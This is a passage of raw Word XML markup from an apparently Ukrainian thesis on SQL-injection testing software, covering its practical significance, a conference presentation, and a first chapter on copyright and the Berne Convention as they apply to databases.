        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Практичне значення отриманих результатів:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D8C10B" w14:textId="1F099FE9" w:rsidR="00D16E1B" w:rsidRDefault="00D16E1B" w:rsidP="00D16E1B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Розроблено </w:t>
      </w:r>
      <w:r w:rsidR="007D796A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>програмне забезпечення</w:t>
      </w:r>
      <w:r w:rsidRPr="00D16E1B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D16E1B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>як</w:t>
      </w:r>
      <w:r w:rsidR="007D796A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="00D16E1B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> допоможе «фахівцям з тестування на проникнення» або розробникам проводити ручне та автоматизоване тестування веб-додатків на наявність SQL-ін’єкцій.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427B2A31" w14:textId="4376C54F" w:rsidR="00475839" w:rsidRPr="00D16E1B" w:rsidRDefault="00475839" w:rsidP="00475839">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Апробація. </w:t>
      </w:r>
      <w:r w:rsidRPr="00475839">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Дане питання було розглянуто на XV Міжнародній науково-практичній конференції «Динаміка сучасної науки - 2019» в секції «Інформаційна безпека» за темою «Взлом баз даних за допомогою SQL ін’єкцій»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF98BD8" w14:textId="72E2658E" w:rsidR="002E3E8B" w:rsidRPr="00956AC7" w:rsidRDefault="002E3E8B" w:rsidP="00956AC7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2317"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B5332F7" w14:textId="002BEEAD" w:rsidR="00BA24D7" w:rsidRDefault="00BA24D7" w:rsidP="002E3E8B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2317"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30701C2B" w14:textId="77777777" w:rsidR="00BA24D7" w:rsidRDefault="00BA24D7">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="603EAA81" w14:textId="77777777" w:rsidR="00BA24D7" w:rsidRPr="001676E9" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc516752111"/>
      <w:bookmarkStart w:id="2" w:name="_Toc30433095"/>
      <w:r w:rsidRPr="001676E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>РОЗДІЛ 1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="5F2007A1" w14:textId="77777777" w:rsidR="00BA24D7" w:rsidRPr="001676E9" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc516752112"/>
      <w:bookmarkStart w:id="4" w:name="_Toc30433096"/>
      <w:r w:rsidRPr="001676E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>НОРМАТИВНО-ПРАВОВІ СТАНДАРТИ В ГАЛУЗІ ЗАХИСТУ БАЗ ДАНИХ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="051400C0" w14:textId="61C1383C" w:rsidR="00BA24D7" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C974D3B" w14:textId="77777777" w:rsidR="00962467" w:rsidRPr="003B780E" w:rsidRDefault="00962467" w:rsidP="00BA24D7">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B6D6D3C" w14:textId="77777777" w:rsidR="00BA24D7" w:rsidRPr="001676E9" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc516752113"/>
      <w:bookmarkStart w:id="6" w:name="_Toc30433097"/>
      <w:r w:rsidRPr="001676E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>1.1 Авторське право і бази даних</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="60048C6F" w14:textId="77777777" w:rsidR="00BA24D7" w:rsidRPr="00D84A48" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:ind w:left="1234"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="298C5F0F" w14:textId="59A68989" w:rsidR="00BA24D7" w:rsidRPr="00D84A48" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>За час свого існування людство створило чимало способів збереження даних, інформації в упорядкованому вигляді. З останніх – енциклопедії, підручники. Всі вони втілюють різні методи розміщення даних, інформації. Прикладом їх є і компіляції даних (бази даних), які під впливом розвитку індустрії інформатики стали стрімко розвиватися. Переважна більшість інформаційних систем містить у своєму складі бази даних</w:t>
      </w:r>
      <w:r w:rsidR="002C13E9" w:rsidRPr="002C13E9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09278909" w14:textId="0F343469" w:rsidR="00BA24D7" w:rsidRPr="00D84A48" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>В останні роки в  галузі інтелектуальної власності виникли нові права, що відносяться до авторського права. Перш за все мова йде про права на бази даних, які стали поширеним об’єктом інтелектуальної власності. Це пов’язано з процесом розвитку інформаційного суспільства в Україні. Бази даних вже давно стали необхідною умовою інформаційного суспільства та складають значну частину інформаційних ресурсів</w:t>
      </w:r>
      <w:r w:rsidR="002C13E9" w:rsidRPr="002C13E9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC0D5CA" w14:textId="535651E6" w:rsidR="00BA24D7" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00544445">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>База даних – представлена в об‘єктивній формі сукупність самостійних матеріалів (статей, розрахунків, нормативних актів, судових рішень та інших подібних матеріалів), систематизованих так, щоб ці матеріали могли бути знайдені та оброблені за допомогою електронної обчислювальної машини [1]</w:t>
      </w:r>
      <w:r w:rsidRPr="00544445">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Перевага електронних баз даних полягає не стільки в способі рубрикації матеріалу, скільки в його обсязі та можливостях швидкого доступу</w:t>
      </w:r>
      <w:r w:rsidR="002C13E9" w:rsidRPr="002C13E9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD69714" w14:textId="77777777" w:rsidR="00BA24D7" w:rsidRPr="00D84A48" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F6E94EF" w14:textId="77777777" w:rsidR="00BA24D7" w:rsidRPr="001676E9" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="576"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc516752114"/>
      <w:bookmarkStart w:id="8" w:name="_Toc30433098"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>1.2</w:t>
      </w:r>
      <w:r w:rsidRPr="001676E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> Актуальність теми</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidRPr="001676E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00547749" w14:textId="77777777" w:rsidR="00BA24D7" w:rsidRPr="003B780E" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4370D2B5" w14:textId="10E3D260" w:rsidR="00BA24D7" w:rsidRPr="002C13E9" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Захист баз даних є складною інженерною, організаційною та, у першу чергу, правовою проблемою. Створення бази даних здебільшого вимагає значного вкладення коштів та часу при тому, що вони, зазвичай, легко відтворюються. Ці дві обставини роблять бази даних ідеальним «кандидатом» в об’єкти права інтелектуальної власності</w:t>
      </w:r>
      <w:r w:rsidR="002C13E9" w:rsidRPr="002C13E9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[2].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A504385" w14:textId="77777777" w:rsidR="00BA24D7" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>До числа публікацій, присвячених дослідженню компіляції даних (бази даних) в цивільному праві, варто віднести наукові праці Б. Едельмана, Л. Г. Кравець, В. А. Дозорцева та деяких інших вчених. Широке застосування комп’ютерних цифрових технологій, які значно підвищили потенціал баз даних, виявило недосконалість міжнародного законодавства та низки законодавств країн-членів ЄС в частині їх правової охорони. Невідповідність правового інструментарію новим технічним засобам і відносинам, що викликані ним, яскраво розкрилися в зв’язку з невідповідністю правової охорони бази даних існуючим потребам ринкової економіки. Обмін даними є одним із найважливіших напрямів міжнародного співробітництва. У багатьох випадках успіх наукового дослідження та здійснюваної на його підґрунті діяльності прямо залежать від доступних даних (пошук нових видів енергоресурсів, дослідження всесвіту). Розпад Радянського Союзу зробив можливим доступ до багатьох баз даних, які не могли бути раніше доступні через існуючу на той час комуністичну ідеологію. Наприклад, стали публічно доступними результати геомагнітних та океанографічних досліджень, що проводилися в СРСР, знімки із супутників США, Великобританії, Італії, Франції. Отже, розширення міжнародних зв’язків, поширення обміну інформацією означає, що питання охорони прав на бази даних повинні вирішуватися і на міжнародному рівні [2].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543B1E68" w14:textId="77777777" w:rsidR="00BA24D7" w:rsidRPr="00D84A48" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B0A547E" w14:textId="77777777" w:rsidR="00BA24D7" w:rsidRPr="001676E9" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="576"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc516752115"/>
      <w:bookmarkStart w:id="10" w:name="_Toc30433099"/>
      <w:r w:rsidRPr="001676E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>1.3 Міжнародні нормативно – правові угоди</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="5658685F" w14:textId="77777777" w:rsidR="00BA24D7" w:rsidRPr="00D84A48" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18A8F56E" w14:textId="77777777" w:rsidR="00BA24D7" w:rsidRPr="001676E9" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="993"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc516752116"/>
      <w:bookmarkStart w:id="12" w:name="_Toc30433100"/>
      <w:r w:rsidRPr="001676E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>1.3.1 Бернська конвенція</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="24DC4C89" w14:textId="77777777" w:rsidR="00BA24D7" w:rsidRPr="00D84A48" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3270F9DD" w14:textId="4A1A7BF4" w:rsidR="00BA24D7" w:rsidRPr="00D84A48" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Ставши одним із об’єктів авторського права, бази даних підпадають під дію низки міжнародних угод. Бернська конвенція є найстаршим міжнародно-правовим договором у галузі авторського права, яка була прийнята 9 вересня 1886 р.. Україна приєдналася до неї 31 травня 1995 р. Бернська конвенція заснована на трьох принципах: «національний режим», відповідно до якого твори, створені в одній із країн-учасниць, отримують в усіх інших країнах-членах таку ж охорону, яку ці країни надають власним авторам; «автоматична охорона», згідно з якою охорона надається на підставі факту створення твору і не залежить від будь-яких формальностей; «незалежна охорона», відповідно до якої володіння наданими правами та їх здійснення не залежить від існування охорони в країні походження твору</w:t>
      </w:r>
      <w:r w:rsidR="0096070A" w:rsidRPr="0096070A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> [3]</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332E61D0" w14:textId="77777777" w:rsidR="00BA24D7" w:rsidRPr="00D84A48" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Для визнання бази даних предметом охорони в межах Конвенції необхідне спеціальне тлумачення, відповідно до якого текст Конвенції не забороняє включення до збірки матеріалів, що не охороняються авторським правом. З моменту свого виникнення і донині саме як збірки і підлягають охороні бази даних в міжнародному та більшості законодавств країн-учасниць. Бернська конвенція (ст. 5) визначає, що автори – громадяни будь-якої країни-учасниці – користуються в країнах Союзу правами, які надаються або будуть надані в подальшому відповідними законами цих країн своїм авторам (принцип національного режиму) [3].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156B29D4" w14:textId="6D7256A5" w:rsidR="00BA24D7" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Стосовно бази даних, як об’єкта авторського права, правило національного режиму означає, що права автора бази даних, випущеної у світ на території іншої країни-учасниці, будуть відповідати правам, що надаються автору бази даних – громадянину держави, на території якої база даних вперше оприлюднена</w:t>
      </w:r>
      <w:r w:rsidR="002C13E9" w:rsidRPr="002C13E9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> [3]</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B306582" w14:textId="77777777" w:rsidR="00BA24D7" w:rsidRPr="00D84A48" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AB30E9C" w14:textId="77777777" w:rsidR="00BA24D7" w:rsidRPr="007C39A4" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="993"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc516752117"/>
      <w:bookmarkStart w:id="14" w:name="_Toc30433101"/>
      <w:r w:rsidRPr="007C39A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
